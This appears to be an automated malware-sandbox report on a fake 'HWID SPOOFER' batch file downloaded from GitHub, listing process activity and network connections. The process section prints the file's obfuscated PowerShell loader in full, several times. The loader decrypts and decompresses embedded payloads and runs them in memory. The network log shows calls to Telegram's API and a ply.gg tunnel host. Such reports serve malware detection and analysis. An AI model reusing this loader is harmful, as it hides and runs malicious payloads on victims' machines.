PID 1404 wrote to memory of 4792 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 4792 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 3164 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff86a12ab58,0x7ff86a12ab68,0x7ff86a12ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2976 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2984 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4232 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:8

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff86a12ab58,0x7ff86a12ab68,0x7ff86a12ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1632 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4644 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4788 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4920 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4996 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4476 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4324 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4512 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap16032:82:7zEvent9855

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HWID SPOOFER\HWID SPOOFER.bat

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1640 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\HWID SPOOFER\HWID SPOOFER.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7krhFZLJS7SrbAK/SPX/R0iGDhCb49bliw9g2rzXVe4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PrxXisurwtM+kNbv8lvGJA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MPNFi=New-Object System.IO.MemoryStream(,$param_var); $jUgqy=New-Object System.IO.MemoryStream; $YFVkN=New-Object System.IO.Compression.GZipStream($MPNFi, [IO.Compression.CompressionMode]::Decompress); $YFVkN.CopyTo($jUgqy); $YFVkN.Dispose(); $MPNFi.Dispose(); $jUgqy.Dispose(); $jUgqy.ToArray();}function execute_function($param_var,$param2_var){ $XBOrB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iyzvJ=$XBOrB.EntryPoint; $iyzvJ.Invoke($null, $param2_var);}$cQCUs = 'C:\Users\Admin\Desktop\HWID SPOOFER\HWID SPOOFER.bat';$host.UI.RawUI.WindowTitle = $cQCUs;$BYUnJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cQCUs).Split([Environment]::NewLine);foreach ($CSAwu in $BYUnJ) { if ($CSAwu.StartsWith('JHdLrGTjZaoUwRUbIyjB')) { $aUcFn=$CSAwu.Substring(20); break; }}$payloads_var=[string[]]$aUcFn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\HWID SPOOFER\HWID SPOOFER.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7krhFZLJS7SrbAK/SPX/R0iGDhCb49bliw9g2rzXVe4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PrxXisurwtM+kNbv8lvGJA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MPNFi=New-Object System.IO.MemoryStream(,$param_var); $jUgqy=New-Object System.IO.MemoryStream; $YFVkN=New-Object System.IO.Compression.GZipStream($MPNFi, [IO.Compression.CompressionMode]::Decompress); $YFVkN.CopyTo($jUgqy); $YFVkN.Dispose(); $MPNFi.Dispose(); $jUgqy.Dispose(); $jUgqy.ToArray();}function execute_function($param_var,$param2_var){ $XBOrB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iyzvJ=$XBOrB.EntryPoint; $iyzvJ.Invoke($null, $param2_var);}$cQCUs = 'C:\Users\Admin\Desktop\HWID SPOOFER\HWID SPOOFER.bat';$host.UI.RawUI.WindowTitle = $cQCUs;$BYUnJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cQCUs).Split([Environment]::NewLine);foreach ($CSAwu in $BYUnJ) { if ($CSAwu.StartsWith('JHdLrGTjZaoUwRUbIyjB')) { $aUcFn=$CSAwu.Substring(20); break; }}$payloads_var=[string[]]$aUcFn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\HWID SPOOFER\HWID SPOOFER.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7krhFZLJS7SrbAK/SPX/R0iGDhCb49bliw9g2rzXVe4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PrxXisurwtM+kNbv8lvGJA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MPNFi=New-Object System.IO.MemoryStream(,$param_var); $jUgqy=New-Object System.IO.MemoryStream; $YFVkN=New-Object System.IO.Compression.GZipStream($MPNFi, [IO.Compression.CompressionMode]::Decompress); $YFVkN.CopyTo($jUgqy); $YFVkN.Dispose(); $MPNFi.Dispose(); $jUgqy.Dispose(); $jUgqy.ToArray();}function execute_function($param_var,$param2_var){ $XBOrB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iyzvJ=$XBOrB.EntryPoint; $iyzvJ.Invoke($null, $param2_var);}$cQCUs = 'C:\Users\Admin\Desktop\HWID SPOOFER\HWID SPOOFER.bat';$host.UI.RawUI.WindowTitle = $cQCUs;$BYUnJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cQCUs).Split([Environment]::NewLine);foreach ($CSAwu in $BYUnJ) { if ($CSAwu.StartsWith('JHdLrGTjZaoUwRUbIyjB')) { $aUcFn=$CSAwu.Substring(20); break; }}$payloads_var=[string[]]$aUcFn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5324 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5224 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4384 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4252 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5464 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4196 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5472 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5896 --field-trial-handle=1628,i,11822879546446421930,15224680912419036559,131072 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 185.199.111.154:443 github.githubassets.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 10.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 154.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 collector.github.com udp
GB 142.250.187.234:443 content-autofill.googleapis.com tcp
US 140.82.113.22:443 collector.github.com tcp
US 140.82.113.22:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 22.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.99:443 www.bing.com tcp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 99.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.169.46:443 play.google.com udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 216.197.17.2.in-addr.arpa udp
US 185.199.108.133:443 user-images.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 private-user-images.githubusercontent.com udp
GB 142.250.187.234:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 codeload.github.com udp
GB 20.26.156.216:443 codeload.github.com tcp
US 8.8.8.8:53 216.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 care-hoping.gl.at.ply.gg udp
US 147.185.221.20:7782 care-hoping.gl.at.ply.gg tcp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp
US 147.185.221.20:7782 care-hoping.gl.at.ply.gg tcp
US 147.185.221.20:7782 care-hoping.gl.at.ply.gg tcp
US 147.185.221.20:7782 care-hoping.gl.at.ply.gg tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.21:443 collector.github.com tcp
US 140.82.113.21:443 collector.github.com tcp
US 8.8.8.8:53 21.113.82.140.in-addr.arpa udp
US 147.185.221.20:7782 care-hoping.gl.at.ply.gg tcp
US 147.185.221.20:7782 care-hoping.gl.at.ply.gg tcp
US 147.185.221.20:7782 care-hoping.gl.at.ply.gg tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 camo.githubusercontent.com udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 216.58.213.10:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 10.213.58.216.in-addr.arpa udp
US 147.185.221.20:7782 care-hoping.gl.at.ply.gg tcp
US 8.8.8.8:53 joueursdecodfr.mygamesonline.org udp
BG 185.176.43.108:80 joueursdecodfr.mygamesonline.org tcp
BG 185.176.43.108:80 joueursdecodfr.mygamesonline.org tcp
US 8.8.8.8:53 108.43.176.185.in-addr.arpa udp
BG 185.176.43.108:80 joueursdecodfr.mygamesonline.org tcp
BG 185.176.43.108:80 joueursdecodfr.mygamesonline.org tcp
US 8.8.8.8:53 cod-fr.mygamesonline.org udp
BG 185.176.43.100:80 cod-fr.mygamesonline.org tcp
BG 185.176.43.100:80 cod-fr.mygamesonline.org tcp
BG 185.176.43.100:80 cod-fr.mygamesonline.org tcp
BG 185.176.43.100:80 cod-fr.mygamesonline.org tcp
BG 185.176.43.100:80 cod-fr.mygamesonline.org tcp
BG 185.176.43.100:80 cod-fr.mygamesonline.org tcp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.180.14:443 www.youtube.com tcp
US 8.8.8.8:53 cdn.plutonium.pw udp
GB 142.250.180.14:443 www.youtube.com tcp
GB 142.250.180.14:443 www.youtube.com tcp
GB 142.250.180.14:443 www.youtube.com tcp
GB 142.250.180.14:443 www.youtube.com tcp
GB 142.250.180.14:443 www.youtube.com tcp
US 8.8.8.8:53 cod4promod.eu udp
US 8.8.8.8:53 gofile.io udp
US 8.8.8.8:53 www.mediafire.com udp
